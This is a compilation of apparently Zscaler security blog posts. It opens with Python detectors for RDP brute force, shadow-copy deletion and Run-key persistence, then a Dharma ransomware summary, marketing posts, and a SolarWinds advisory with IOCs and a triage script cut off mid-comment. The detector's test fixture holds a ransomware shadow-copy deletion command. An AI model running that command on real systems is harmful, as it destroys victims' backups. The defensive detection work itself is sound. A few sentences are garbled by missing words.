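RDP_LOGON_TYPES = {3, 10}


def rdp_bruteforce(events, threshold=20, window_s=60):
    """Sources with >= threshold failed logons inside window_s seconds, with a
    flag for whether a later remote-interactive success came from that source."""
    fails, successes = defaultdict(list), defaultdict(list)
    for e in events:
        if e["EventID"] == 4625 and e.get("LogonType") in RDP_LOGON_TYPES:
            fails[e["IpAddress"]].append(e["Time"])
        elif e["EventID"] == 4624 and e.get("LogonType") == 10:
            successes[e["IpAddress"]].append(e["Time"])
    alerts = []
    for src, times in fails.items():
        times.sort()
        start = 0
        for end in range(len(times)):            # sliding window over sorted times
            while times[end] - times[start] > window_s:
                start += 1
            if end - start + 1 >= threshold:
                burst_end = times[end]
                alerts.append({
                    "source": src,
                    "failures": len(times),
                    "followed_by_success": any(t >= burst_end for t in successes[src]),
                })
                break
    return alerts


def shadow_copy_deletion(events):
    """4688 process creations whose command line deletes shadow copies."""
    return [e for e in events
            if e["EventID"] == 4688 and SHADOW_DELETE.search(e.get("CommandLine", ""))]


def run_key_persistence(events):
    """Sysmon event 13 writes under HKLM/HKCU ...\\CurrentVersion\\Run."""
    return [e for e in events
            if e["EventID"] == 13 and RUN_KEY.search(e.get("TargetObject", ""))]


def build_events():
    """Constructed timeline: failure burst, success, shadow deletion, Run key."""
    t0 = 1_600_000_000
    ev = [{"EventID": 4625, "Time": t0 + i, "IpAddress": "203.0.113.7", "LogonType": 3}
          for i in range(25)]                                  # 25 failures in 25 s
    ev += [{"EventID": 4625, "Time": t0 + 5, "IpAddress": "198.51.100.5", "LogonType": 3},
           {"EventID": 4625, "Time": t0 + 9, "IpAddress": "198.51.100.5", "LogonType": 3}]
    ev.append({"EventID": 4624, "Time": t0 + 40, "IpAddress": "203.0.113.7", "LogonType": 10})
    ev.append({"EventID": 4688, "Time": t0 + 300, "Image": r"C:\Windows\System32\cmd.exe",
               "CommandLine": 'cmd.exe /c "mode con cp select=1251 & vssadmin delete shadows /all /quiet & exit"'})
    ev.append({"EventID": 4688, "Time": t0 + 301, "Image": r"C:\Windows\System32\notepad.exe",
               "CommandLine": "notepad.exe"})
    ev.append({"EventID": 13, "Time": t0 + 302,
               "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Info",
               "Details": r"C:\Windows\System32\Info.hta"})
    return ev


if __name__ == "__main__":
    events = build_events()
    print(rdp_bruteforce(events))
    print(len(shadow_copy_deletion(events)), "shadow-copy deletion(s)")
    print(len(run_key_persistence(events)), "Run-key write(s)")
```

The brute-force rule is deliberately source-keyed rather than account-keyed: the distributed attacks the post describes spread attempts across many usernames, and a burst from one address followed by a type-10 success is the sequence worth paging on. The same sliding-window logic applies to any authentication-failure stream, including SSH.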
Conclusion
Since Dharma ransomware is usually installed by gaining access to Remote Desktop Services, it is important to ensure that those services are properly locked down. This includes ensuring that computers running Remote Desktop Services do not connect directly to the internet. Instead, organizations should use a zero trust architecture to allow remote users to securely access these servers without exposing them to the entire internet. While applying security patches is always important, most RDP-based attacks rely on cracking weak credentials, so passwords should be long, unique, and random. It’s important for enterprises to establish password requirements and train employees to use strong passwords. Attackers typically identify potential targets by scanning the internet for systems listening on the default RDP port (TCP 3389). Changing the listening port via the Windows Registry reduces exposure to opportunistic scans, but it is obscurity only: internet-wide scanners fingerprint RDP on any port, so treat it as a minor supplement to the measures above, never a substitute.

MITRE ATT&CK tactic and technique mapping
ID      Technique
T1190   Exploit Public-Facing Application
T1059   Command Line Interface
T1061   Graphical User Interface
T1547   Boot or Logon Autostart Execution
T1037   Startup Items
T1110   Brute Force
T1003   Credential Dumping
T1083   File and Directory Discovery
T1135   Network Share Discovery
T1018   Remote System Discovery
T1063   Security Software Discovery
T1076   Remote Desktop Protocol
T1105   Remote File Copy
T1486   Data Encrypted for Impact

Fri, 08 Jan 2021 10:00:01 -0800 Mohd Sadique

Intelligent Patient-Zero Prevention Powered by AI
During 2020, Zscaler brought significant innovations to our Zero Trust Exchange, the Zscaler cloud platform that powers all Zscaler services, including further evolving our inline Advanced Cloud Sandbox. We are excited to close out the year with the introduction of the world’s first AI-driven quarantine engine for Cloud Sandbox, further extending the strong malware protection we deliver to our customers.
In the early days of sandboxing technology, customers used it to detect unknown malware missed by traditional signature-based technologies. It worked well for many instances of unknown malware. But one of its gaps was the ability to stop patient-zero infections: by the time the sandbox detected an emerging threat, the first instance had already arrived at the endpoint. To solve the patient-zero challenge, Zscaler reinvented malware analysis a few years ago by adding the ability to quarantine suspicious content inline, which is only possible due to our unique proxy architecture. With this capability, customers could prevent "patient-zero" incidents when using the quarantine policy on files going through the Zscaler cloud. However, quarantining can introduce a delay in the delivery of legitimate files, and we are always striving to improve the user experience.

To solve this pain point, the Machine Learning, Cloud Sandbox, and Security Research teams at Zscaler reimagined the quarantine capability with an inline AI model that significantly reduces wait times, ensuring that customers can benefit from the added security of quarantine without impacting their users or operations. The AI model recommends “quarantine” for high-risk, unknown threats in real time, resulting in:
Better security: Some customers did not want to turn on quarantine, risking potential patient-zero infections from unknown malware. Now, the inline AI model makes the quarantine verdict in real time, so customers get more comprehensive protection.
Better user experience: In the past, some users experienced delays while waiting for clearance on quarantined files. Now, the inline AI model allows low-risk files through while detonating the content in parallel.

The industry never believed it would be possible to simultaneously achieve real-time speed and comprehensive coverage. Traditional AV signature methodology is fast but doesn’t provide wide enough coverage for emerging threats. Sandboxes cover emerging threats, but they are not super-fast. Customers were often forced to choose, sometimes resulting in a reduced security posture. Traditional sandbox vendors lack the cloud-native proxy architecture required for inline quarantine, preventing them from offering this critical capability. But with the new AI-powered Cloud Sandbox, Zscaler customers get inline quarantine for the majority of their files, without user impact.

We demonstrated our research into the AI-powered Cloud Sandbox capabilities with a Fortune 500 customer, National Oilwell Varco (NOV), at Zenith Live in 2019. The diagram below shows that, out of a total of 5,765 files during the 20-day research period, 5,249 (91 percent) got the instant quarantine verdict (all correct). Those are the files that can be quarantined with no delay to the user.

As the Co-founder/CEO of TrustPath, acquired by Zscaler two years ago, the productization of inline intelligent patient-zero prevention in the Zscaler Cloud Sandbox marks the second integration milestone within the Zscaler family. It is a truly special and proud moment for my team and myself. From the beginning, we have had a dream to deliver both “better security” and “better user experiences” at the same time by leveraging Machine Learning and AI. And now, our dream has come true inline with the Zscaler Zero Trust Exchange, the industry’s largest inline security cloud, which processes and protects over 140 billion transactions per day!

Tue, 22 Dec 2020 08:00:01 -0800 Howie Xu

Seven Reasons Why Your Cloud Security is a Mess
The term “viral” is most commonly associated with consumer-related content, apps, etc., that rapidly grow in popularity as they spread from one person to the next. But pioneering enterprise software companies have also been able to leverage virality to achieve high growth. One of the earliest successful examples was when Dropbox offered free storage space in exchange for referrals.
Then came Slack, growing via word of mouth with no particular incentive other than the ability to communicate with colleagues in a compelling new way. More recently, cloud platforms such as AWS, GCP, and Azure have enjoyed similar “viral” effects inside organizations. Sure, many enterprises have progressive leaders who have embraced a “cloud-first” model, but for others, the growth of cloud has been organic and user-led, much like Dropbox and Slack's early days. While cloud platforms bring a range of benefits to organizations and users alike, they can also introduce challenges to networking and security teams. Let's review the seven reasons why securing rapidly expanding cloud activity has become overly complex and ineffective.

1. It starts with a relatively simple deployment in a single AWS region, spun up for a new project by an application development team. Unfortunately, well-intentioned developers often miss basic security configurations, leaving this environment susceptible to breach.
2. A new developer joins the team from a cloud-first startup that had widely adopted AWS but hadn’t done much to enforce security. Because the environment is user-controlled, this developer spins up a new, previously unknown VPC with no security policies applied to it.
3. New security components get added to manage the traffic between these VPCs. Everything is in the same region and has no external connectivity so, despite a bumpy start, this deployment is still relatively simple.
4. The organization decides to make the applications and the environment accessible to a broader range of users, which means the addition of several security appliances to the environment, including multiple virtual firewalls and VPNs. This is where things really start to get complicated: managing static, network-based policies and dealing with the scaling limitations of IPsec VPNs.
5. Several of your now-growing inventory of workloads need internet access for things like software updates and API connections to third-party services. Of course, you want to protect your environment from malicious software and other internet-based threats, so you put up more virtual firewalls, increasing management time and overhead.
6. As your cloud environment grows further, you also add more regions and start to deploy to other cloud platforms. This expansion leads to more vFW policies, more IPsec VPNs, and even more complication, because now you’re dealing with not one but multiple cloud platforms, each of which has its own way of handling connectivity and security services.
7. Now that you’ve deployed into other cloud platforms, you need to recreate your build-out of security from scratch, ensuring that your new environment is locked down just like your original deployment.

A better approach
Zscaler Cloud Protection (ZCP) was built to take the work out of securing cloud workloads. The solution is designed to deliver the same high performance and globally distributed reliability that you’ve come to trust from Zscaler. ZCP is deployed via easy-to-understand business-level policies and a simplified security stack, resulting in better security, a 90 percent reduction in policies, 90 percent fewer services to manage and maintain, and cost reductions of 30 percent or more.

Complexity is the enemy of security
It’s long been said that complexity is the enemy of security, but most organizations have found it too difficult to unwind the complexity that has built up over time in their on-premises and data center environments. The move to the cloud is your once-in-a-career opportunity to eliminate complexity from your environments. A cloud protection platform based on zero trust is the way to do that. Zscaler can help you get there.
Tue, 15 Dec 2020 11:50:39 -0800 Rich Campagna

Cybersecurity Past, Present, and Future: ThreatLabZ Looks at 2020 and the Year Ahead
Welcome to the end of 2020. The close of every year brings a lot of online activity, especially now, with everyone at home and socially distancing. Unfortunately, even as people stay at home to protect themselves, they are not safe from threat actors, who are busy developing exploits targeted at people working and shopping online. In keeping with the season, let’s take a page from a famous holiday story and look at the past, present, and future of cybersecurity findings by the ThreatLabZ team.

Past reports
Throughout 2020, the ThreatLabZ team published research collected from data in the Zscaler Zero Trust Exchange global cloud. Below are the five most-read stories we reported:

In March, ThreatLabZ researchers detected several WordPress and Joomla sites serving Shade/Troldesh ransomware, backdoors, redirectors, and a variety of phishing pages. The most well-known threats to CMS sites result from vulnerabilities introduced by plugins, themes, and extensions. WordPress and Joomla sites have become popular targets for malicious actors to hack and inject with malicious content.

In August, ThreatLabZ observed a malicious site that used LinkedIn as the lure for a social engineering scheme designed to steal a user’s credentials and spread malicious binaries.

In September, Zscaler ThreatLabZ posted about the rise in Microsoft Azure domains used to host phishing attacks and similar activity on the Google domains and These campaigns use SSL certificates issued by and and have well-designed login pages that attempt to spoof popular brands widely used in business, such as Dropbox Business, Microsoft Outlook and SharePoint, and DocuSign. They are designed to capture login credentials, which are sent to a remote server.
- In September, the Zscaler ThreatLabZ team found seventeen applications in the Google Play store containing the Joker malware. The easy availability of those apps (which were downloaded 120,000 times) represents a significant threat to Android users. Perhaps more troubling is how easily attackers are (still) able to sneak malware-hiding apps through Google’s vetting process.

- In October, the Zscaler ThreatLabZ team discovered that the Chinese state-sponsored threat actor APT31 was responsible for several malicious binaries hosted on attacker-controlled GitHub accounts. These binaries dropped and displayed decoy content with a COVID-19 vaccine theme as a social engineering technique.

Present malfeasance

This year in particular created a massive uptick in online activity, and cybercriminals are taking advantage of that increase and looking for ways to exploit it:

- With the holidays come Black Friday, Cyber Monday, and other enticements to lure consumers into buying products online, and Zscaler noticed attackers taking advantage of this holiday activity for targeted cybercrime. Cybercriminals have always targeted Cyber Monday and Black Friday with phishing scams, malware attacks, and malicious card skimmers injected into compromised e-commerce sites to steal payment card information. ThreatLabZ researchers saw the expected spike in cyberattacks during the weeks leading up to Cyber Monday and anticipate that the trend will continue through December.

- With most companies adopting some form of public cloud offering, ThreatLabZ analyzed the current state of cloud (in)security. Cloud vendors have enormous security resources available, yet barely a day goes by without news of another cloud security incident. Most of these incidents can be traced back to insecure use of cloud services rather than security flaws in the services themselves.

- ThreatLabZ found a fake version of the hugely popular game Among Us in the Google Play store.
The phony app is titled Amoungus and is just adware: once installed, it bombards the user with advertisements. The app asks users to log in or register with Gmail credentials, but the version analyzed does not send those credentials to the attacker.

Future concerns

The ThreatLabZ team not only keeps track of the past and present but also looks to the future, with some predictions on the cybersecurity issues we might see in 2021:

- The 2020 rush to remote work will fuel massive breaches in 2021. COVID-19 concerns forced many enterprises to set up nearly all employees for remote work. Organizations that didn’t properly configure their security architecture (cloud-native SASE architecture) for a distributed workforce expanded their attack surface and are ripe for cybercrime. Now that the dust is settling on the shift, we’ll start to see data breaches due to poorly thought-out security and corporate devices coming “in from the cold” bringing malware with them.

- Ransomware will be treated as a data breach. Organizations must come to grips with the surging sophistication of cyberattacks and treat ransomware as a company-wide responsibility, not just a CISO issue. Company-wide ransomware playbooks and response plans will dictate exactly what to do, how to mitigate damage to the brand, and how to address compliance matters related to leaked or stolen data.

- Cybercriminals will target specific markets. Pharmaceutical, biotech, and healthcare companies will see increases in targeted nation-state attacks. The attackers’ goals will be stealing intellectual property and PHI and skimming credentials through targeted phishing campaigns that align with public interests (such as COVID-19 developments and breakthroughs).

- We will continue to see fallout from the SolarWinds supply chain attack (and others like it). On Dec.
13, 2020, FireEye provided detailed information on a widespread attack campaign involving a backdoored component of the SolarWinds Orion platform, which organizations use to monitor and manage IT infrastructure. Attackers will continue to attempt breaches that exploit compromised infrastructure software.

- Public clouds will continue to be a source of attack propagation. Growing enterprise consumption of public cloud will increase the number of attacks hosted in public cloud resources. Protecting against these attacks starts with securing the cloud workloads themselves.

- The need for cybersecurity expertise will grow more critical. There is an extreme skills shortage in cybersecurity and a massive gap between what we have and what we need. Understanding how to protect corporate assets in the cloud- and mobile-first world requires training and dedication. Enterprises would do well to increase resources for cybersecurity training programs and partners.

Zscaler manages the world’s largest security cloud. Each day, Zscaler blocks more than 100 million threats to its 4,000+ customers. Using state-of-the-art AI and machine-learning technology, the Zscaler ThreatLabZ security research team analyzes Zscaler Zero Trust Exchange traffic and shares its findings. The Zscaler ThreatLabZ team wishes everyone a happy and secure 2021!

Thu, 17 Dec 2020 14:31:54 -0800 Deepen Desai

My Highlights from Zenith Live 2020 APJ Day Two

This post also appeared on LinkedIn.

Zenith Live 2020 has come to an end, but only after two days of engaging secure digital transformation customer stories, Zscaler cloud platform product innovations, hands-on architectural deep-dives, and some exciting keynotes. This year, Zenith Live went virtual, with sessions available online (and for free). That served to make the sessions all the more personal, since every speaker was seemingly in the room with me. Below, my highlights from day two.
Yesterday, Zscaler President and CTO Amit Sinha shared Zscaler’s new innovations in CASB and DLP technology. Today, he kicked off the event with a session titled “Cyberthreats and Cloud Protection Innovations,” and began with the announcement of Zscaler Cloud Protection, an exciting new offering that secures enterprise applications and workloads. He also introduced Jeremy Embalabala, VP of Information Security for insurance brokerage firm HUB International. Jeremy has led secure digital transformation initiatives at HUB, and the switch to Zscaler (and the cloud) has improved both security and transparency. After HUB adopted Zscaler Internet Access (ZIA), explained Jeremy, “[w]e gained new insight into our traffic flow. We were able to understand and categorize what type of traffic was flowing across our network, when previously we didn't have any visibility.”

After Amit, we heard from IT leaders with Zscaler customer Takeda Pharmaceutical Company. The Tokyo-based firm is the oldest pharmaceutical company in the world, and is celebrating its 240th birthday! CISO Mike Towers shared the company’s secure digital transformation journey to a zero trust architecture. He noted that Takeda works with more than 30,000 partners, and “nearly a quarter” of them present some level of cybersecurity risk. “The B2B area and the partner ecosystem,” said Mike, “is another area where zero trust is something that we absolutely need.”

Zscaler has been a long-time development partner with Microsoft: the two companies’ cloud technologies complement each other to deliver benefits to enterprise customers. In a partner session today, Microsoft CVP Alex Simons provided an overview of the Microsoft and Zscaler components of a unified zero trust architecture, and even invited some joint customers to join him.
Matthias Quernheim, Head of Global Connectivity and Security Solutions with French pharmaceutical company Sanofi, expressed great appreciation for the way cloud services from the two companies have benefited his company. “In total,” he said, “we are really happy that we made the right decisions in 2019 going with Zscaler and Microsoft.”

In the afternoon keynote, Andy Greenberg—a Wired Magazine reporter and author of the book Sandworm—described his experience tracking the notorious cyberattacks on Ukraine’s power grid and on the 2018 Olympics, as well as the genesis of the NotPetya outbreak. His story (particularly the detective work behind tracing the attacks to the Russian state-sponsored Sandworm group) was gripping, but he offered some hope in the face of daunting threats. “In this new era of hyper-sophisticated cyber war teams and highly motivated, well-resourced, for-profit ransomware cyber-criminal gangs carrying out targeted attacks,” explained Andy, “we may not be able to avoid being vulnerable...but we can be resilient against them.”

I hope you were able to attend and enjoy Zenith Live 2020. If you missed anything (today or yesterday), the event session recordings are available to view. And keep an eye out for a future invitation to Zenith Live 2021. It might not be quite as virtual as this year’s event, but I’m sure it will be just as inspiring.

Wed, 16 Dec 2020 01:00:02 -0800 Sudip Banerjee

Zscaler Expands Kiwi Offerings as Microsoft Announces New NZ Region

New Zealand is already home to Lord of the Rings and the formidable All Blacks rugby team, and now it has another powerful asset. To better support Zscaler’s growing client base in the land of the long white cloud, we have created a local deployment of Zscaler Private Access (ZPA). With the announcement of the first Microsoft data centre region in the country, ZPA enables clients to take full advantage of a Zero Trust Network Access (ZTNA) security strategy.
ZTNA provides a secure and scalable alternative to traditional Virtual Private Networks (VPNs) and is designed with remote workers in mind. That is especially relevant in the current reality of the COVID-19 pandemic. ZTNA makes an enterprise’s most precious digital assets go dark to the outside world: unless a user is authorised to access an application or data store, they cannot even see that it exists. This significantly improves infrastructure security.

The new ZPA capabilities, deployed with the support of local technology partner The Instillery, build on Zscaler’s existing presence in the country. Since 2018, we have provided secure internet services from a local data centre, and this additional capability takes our offering to new heights. The launch of ZPA within this new Microsoft region comes at a time when trends such as cloud platforms, Software-as-a-Service (SaaS), and mobility are reshaping workplaces. The move delivers our clients more support at a time when they need it most.

By delivering a ZTNA capability, ZPA gives users secure access both to existing on-premises applications and resources and to those running on external cloud-based platforms. Performance does not suffer the way it often does when users rely on traditional VPNs. Zscaler’s expanded capabilities in New Zealand will assist both public and private sectors in their journeys toward a cloud-based future. It will also deliver the opportunity to reduce infrastructure costs, improve security, and increase operational agility.

The combination of Zscaler and the Microsoft New Zealand Data Centre Region is big news for our current and future clients. As the only cloud security company that is a Microsoft certified networking partner for Microsoft 365, we are able to deliver a compelling package of services to organisations of all sizes. To find out more about how ZPA can deliver value to your organisation, reach out to us today.
Wed, 16 Dec 2020 08:00:01 -0800 Clive Levido

Zenith Live 2020 APJ First Day Signals a “New Era” of Secure Digital Transformation

This post also appeared on LinkedIn.

We’ve just completed day one of Zenith Live 2020 for the Asia-Pacific region. It was a day of inspiring presentations, innovative product demos, and even an astronaut! Zenith Live looks different this year: it has “gone virtual,” with all sessions available online (and free of charge). Though they weren’t speaking on an actual stage, speakers were engrossing, inspiring, and enthusiastic during the first sessions of this year’s premier global cloud summit.

Zscaler CEO Jay Chaudhry started the day with his keynote address, in which he made the point that enterprise digital transformation requires a zero trust architecture. He noted the “new era” we have entered, where users work from everywhere, data traffic grows exponentially, the cloud is the new data center, and the internet is the new corporate network. Jay also offered an overview of the Zscaler Zero Trust Exchange platform, and emphasized its four key pillars to drive secure digital transformation: secure internet and SaaS access, secure private app access, digital experience, and protected apps and workloads.

In the next session, Zscaler President and CTO Amit Sinha and CIO Patrick Foxhoven shared some of the exciting new Zscaler product and service innovations. Amit shared the Zscaler “Blueprint for secure digital transformation,” with the key message: it’s time to prioritize platform over point products. He provided technical details of Zscaler integration with partner identity management, endpoint protection, cloud provider, SD-WAN, and security operations solutions. In that same session, we heard from Steve Day, EGM for Infrastructure with National Australia Bank (NAB). Steve told of NAB’s secure digital transformation journey from legacy hardware to the cloud.
“Zscaler, and ZPA in particular, turned out to be a really good fit for us,” said Steve. “We're now no longer trying to secure networks across 800 locations across Australia. We're just defending individual applications now at the gateway to those applications, which is really the promise of zero trust.”

CEO Jay Chaudhry next led a “Voice-of-the-Customer” session with several IT leaders from Siemens, including CIO Hanna Hennig, Head of IT Infrastructure Markus Holzheimer, VP of IT Strategy & Governance Frederik Janssen, and Head of DEC Anthony Atherton. They talked about fostering agility and resilience, two things that can be challenging to achieve in a time of crisis. Yet, in response to the pandemic, Siemens was able to pivot quickly to remote work. Hanna, Markus, Frederik, and Anthony led that charge, enabling more than 300,000 employees to work securely from anywhere, with a little help from Zscaler Private Access (ZPA) of course.

Zscaler EVP of Customer Experience and Transformation Kavitha Mariappan interviewed Captain Scott Kelly, a former U.S. Navy fighter pilot and astronaut, noted for the U.S. record he set for the longest single spaceflight. Captain Kelly talked about how he pushed himself beyond limits to achieve his (lofty) goals. He also described in detail what it was like to pilot a spacecraft outside of Earth’s atmosphere.

Zenith Live is known for its breadth of breakout sessions, and this year featured some engrossing customer presentations, partner sessions, and hands-on training. Some popular session topics included a Zscaler Cloud Firewall demo, a technical deep-dive into the Zscaler Client Connector, and best practices for network transformation.
One session was particularly well-attended: Zscaler Solution Architect Takayoshi Takaoka offered an interactive architectural whiteboard workshop on “Application Transformation for Zero Trust.”

Zscaler Director of Transformation Strategy Lisa Lorenzin moderated a panel of Asia-Pacific-region IT leaders for the session “Women in IT: Confidence and Collaboration Bring IT Career Success.” Lisa was joined by Firuza Karimova, Head of Malware Protection & Network Security for Standard Chartered Bank; Indrani Chandrasegaran, Managing Director of Accenture Security with Accenture; and Jody Davids, former CIO at PepsiCo. They talked about their experience navigating the enterprise IT world, and shared advice for skills development, career advancement, and building support networks.

Zenith Live 2020 continues tomorrow at 8:00 AM SGT. (There’s still time to register, by the way!) We’ll hear from Andy Greenberg, the author of Sandworm, who will share his experience tracking the NotPetya malware outbreak. There will also be product innovation news, and customer journey stories from innovative organizations like Takeda Pharmaceutical Company, Sanofi, Unilever, and many more. I hope you can join me for day two!

Tue, 15 Dec 2020 01:00:01 -0800 Scott Robertson

Mission Accomplished: Zenith Live 2020 Goes Beyond Limits

This post originally appeared on LinkedIn.

We’ve just wrapped the general sessions for Zenith Live 2020 for the Americas region, and what an event it was all around! Things were a little different this year as the premier global cloud security summit went virtual, yet moving the event online made it even more engaging, with every attendee enjoying a front-row seat. The event allowed for multiple tracks and greater depth for all attendees in various roles across the IT landscape.
Listening to customers describe how Zscaler has accelerated their digital transformations, and seeing all of the partners who have helped us contribute to our joint customers’ journeys, was both powerful and humbling. It was also exciting, as it validated for all of us that this is the right time and the right platform to help customers drive transformation success at pace and scale.

Customers provided the most inspiring moments at Zenith Live

Innovating is in our DNA, but there’s nothing like hearing from customers employing those innovations in the real world. Steven Hernandez, Director of Information Security with Driscoll’s, shared at Zenith Live how the berry-production conglomerate employs Zscaler Cloud Protection to secure data traffic throughout its complex logistics workflows. “We're able to securely manage, monitor, and protect our data and workloads in record time,” explained Steven, “in a fraction of the time of any other solution, without slowing down the business.”

Also on the mainstage of Zenith Live was an illuminating “Voice-of-the-Customer” presentation from Takeda Pharmaceutical Company. CISO Mike Towers and Global Head of Intelligence, Analytics, and Response Brent Ball described in detail how the company’s secure digital transformation has delivered tangible business benefits. “[Zero Trust] empowers our workforce to operate from wherever,” said Brent, “to improve their productivity, while maintaining—and in many cases, improving—technology controls and proactively mitigating threats against the organization.”

Zscaler’s mission was always to go beyond limits

When Zscaler was founded in 2008, dozens of vendors were vying to become security leaders, offering bigger boxes and doubling down on legacy approaches. Our CEO and founder Jay Chaudhry and his team were never interested in “improving” the status quo; rather, we looked beyond the technology of the day and took a different route, changing cybersecurity entirely.
The mission was to address the new challenges organizations were facing with growing cloud adoption, remote work, and mobile concerns. Zscaler developed a global, massively scalable cloud architecture to help accelerate and secure enterprise customers’ digital transformation. The Zscaler Zero Trust Exchange, a platform through which all connections are securely and intelligently routed, is the world’s largest inline security cloud. Our Zero Trust Exchange cloud processed 10 million transactions, enforced 45,000 policies, and blocked over 6,000 threats in the time it took to read this sentence.

Network security vendors used to dismiss our expanding portfolio of cloud security services, but are now racing to catch up as they try to pivot their products and business models. Other vendors are scrambling to prepare for a world where work is no longer tied to a place, and the internal network is no longer the center of gravity. Zscaler was built for this new world.

My mission: Build a GTM team without limits

Since I joined Zscaler, I’ve made it my mission to recruit team members with the right combination of grit, enthusiasm, and intellectual curiosity. We are growing rapidly, and it is more important now than ever to find innovative people to help us scale the impact we drive for customers. World-class GTM is a team sport. It requires everyone across the organization to be working from the same playbook. Our goal is to build a scalable platform for development and growth that enables success at Zscaler and beyond, for all our teams and our partners.

I’m incredibly proud of what we’ve been able to accomplish with our programmatic Sales Strategy and Process, elite Enablement programs, and comprehensive Revenue Ops model. We are disrupting the way security is delivered and sold. It’s not easy to be disruptive. It’s much harder to sell a platform than a point product.
But I promise you this: nothing compares to the satisfaction of driving quantifiable value while solving significant challenges for our customers. This is what customers need right now, and we are built to deliver these massive transformational gains. If working with grit and optimism, helping customers succeed no matter the challenges, and going beyond limits is your ethos, take a look at our career opportunities: we’re hiring across the entire GTM organization. We are committed to continuously developing our people across all levels and teams, as that is what top talent deserves, and that is what helps us drive impact for our customers.

Wed, 09 Dec 2020 17:28:19 -0800 Dali Rajic

Zscaler Coverage for SolarWinds Cyberattacks and FireEye Red Team Tools Theft

Update

On Dec 13, 2020, FireEye published additional details regarding the breach, tying it to the SolarWinds Orion supply chain attack, in which multiple other organizations were also impacted. FireEye also published countermeasures to detect the campaign at various stages here.

Zscaler Coverage

Zscaler leveraged the countermeasures provided, verified that existing protection was in place, and enhanced coverage wherever required across the multiple layers of the Zscaler security platform. Below is the list of threat names through which Zscaler products detect this campaign.

Advanced Threat Protection
- Win32.Backdoor.SunBurst
- Win32.Backdoor.BEACON

Malware Protection
- PS.Trojan.COSMICGALE
- Win64.Dropper.TearDrop
- Win32.Webshell.SuperNova [attribution not confirmed]
- Win64.Trojan.TearDrop
- Win32.Trojan.Sunspot
- Win32.Backdoor.CobaltStrike
- Win64.Backdoor.RainDrop [attribution not confirmed]

Details regarding these threat signatures can be found in the Zscaler Threat Library.

Advanced Cloud Sandbox

We have ensured that Zscaler Cloud Sandbox flags the Sunburst backdoor. As always, Cloud Sandbox plays a critical role in blocking unknown variants of the malware.
The Zscaler ThreatLabZ team is also actively monitoring this campaign and any activity around the Sunburst backdoor, and will ensure coverage for newer IOCs as they are discovered.

What is the impact?

According to SolarWinds, as many as 18,000 of its customers downloaded the backdoored version of the Orion software between March 2020 and June 2020, including many large enterprises and government agencies.

Is Zscaler affected?

Zscaler uses SolarWinds software and has verified that none of our services are affected by this campaign. We published a trust advisory here.

What can you do to protect yourself?

If you are using the SolarWinds Orion framework in your environment, check whether the version you are running is vulnerable (2019.4 HF 5, 2020.2 with no hotfix, or 2020.2 HF 1) and update it to the latest version according to the SolarWinds advisory. Also check whether you are running any other affected SolarWinds products listed in that advisory.

Detection steps:

1. On each SolarWinds server, search for:
   - any file named “SolarWinds.Orion.Core.BusinessLayer.dll” whose MD5 hash is one of 2c4a910a1299cdae2a4e55988a2f102e, 846e27a652a5e1bfbd0ddd38a16dc865, or b91ce2fa41029f6955bff20079468448 (the file name alone is not an indicator: every Orion install carries a legitimate DLL of that name, and only these builds are backdoored);
   - a file at “C:\WINDOWS\SysWOW64\netsetupsvc.dll”.
2. Scan all the files from step 1 with YARA using the FireEye SunBurst rules.
3. If there is a match, your environment may have been affected. Follow incident response guidelines:
   - isolate, disconnect, or power down the system;
   - reset all credentials used by the SolarWinds software;
   - search your logs for any connections to *.avsvmcloud[.]com or any activity flagged by the Zscaler threat names above.
4. Also review the additional recommendations from DHS and Microsoft.

Zscaler Platform Best Practices:

- Route all server traffic through Zscaler Internet Access, which provides the visibility needed to identify and stop malicious activity from compromised SolarWinds servers.
- Restrict traffic from critical infrastructure to an allow list of known-good destinations.
- Ensure you are inspecting all SSL traffic.
- Turn on Advanced Threat Protection to block all known command-and-control domains.
- Extend command-and-control protection to all ports and protocols with the Advanced Cloud Firewall (Cloud IPS module), including emerging C2 destinations.
- Use Advanced Cloud Sandbox to prevent unknown malware delivered as a second-stage payload.
- Limit the impact of a potential compromise by restricting lateral movement with identity-based micro-segmentation (Zscaler Workload Segmentation) and a zero trust architecture.
- Safeguard crown-jewel applications by limiting lateral movement using Zscaler Private Access.

Zscaler has your back. Engage with our security experts to gain insight into the SolarWinds attacks and get hands-on best-practices guidance to better protect your users, applications, and systems.

[-- End of Update --]

Background

On Dec 8, 2020, FireEye released a public disclosure that the company had suffered a data breach involving a nation-state actor. More details about this disclosure can be found here and here. The adversary was able to steal several red team tools developed by FireEye during this attack. As part of the disclosure, FireEye also released IOCs and signatures for detecting abuse of these red team tools in the wild. In this coverage advisory, we provide details about Zscaler’s coverage for these IOCs.

What is the issue?

The red team tools stolen in this breach were developed internally by FireEye to test its customers’ security. They exhibit behavior similar to many known cyberthreat actors and do not contain any zero-day exploits or unknown techniques. According to FireEye, these tools use well-known, documented methods that are also used by other red teams, and they do not greatly advance an attacker’s overall capabilities.
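Before the red team tools discussion continues, here is the SolarWinds detection procedure from the update above as a small Python triage script. It is an added example, not Zscaler’s or FireEye’s tooling: it walks a directory for SolarWinds.Orion.Core.BusinessLayer.dll and compares the file’s MD5 against the three hashes listed, flags a file at the TEARDROP drop path, and scans log lines for any host under avsvmcloud.com. The log lines and the placeholder files that run_demo() builds in a temporary directory are constructed for the demonstration, and the placeholder’s own hash is passed in as a “known” hash to exercise the match path, since no real sample is embedded. It does not replace the YARA scan in step 2: a DLL of that name with an unlisted hash is reported for YARA follow-up rather than as an indicator, because every Orion install legitimately carries a file of that name.

```python
"""Triage the SUNBURST indicators from the update above: backdoored Orion DLL
hashes, the TEARDROP drop path, and beaconing to avsvmcloud.com.
Added example, not Zscaler's or FireEye's tooling; the sample log lines and the
placeholder files built by run_demo() are constructed for this demonstration."""
import hashlib
import os
import re
import tempfile
from pathlib import Path

# MD5 hashes of the backdoored SolarWinds.Orion.Core.BusinessLayer.dll builds
# listed in the update. Every Orion install has a DLL of this name, so only a
# hash match (or a YARA hit in step 2) makes it an indicator.
SUNBURST_DLL_MD5 = {
    "2c4a910a1299cdae2a4e55988a2f102e",
    "846e27a652a5e1bfbd0ddd38a16dc865",
    "b91ce2fa41029f6955bff20079468448",
}
SUNBURST_DLL_NAME = "solarwinds.orion.core.businesslayer.dll"
# TEARDROP drop location, matched case-insensitively on the last three path
# components so the check also works against a mounted disk image.
TEARDROP_PATH_TAIL = ("windows", "syswow64", "netsetupsvc.dll")
# *.avsvmcloud[.]com (defanged in the advisory). The leading class keeps
# "notavsvmcloud.com" from matching; the optional label group still catches
# the bare apex domain.
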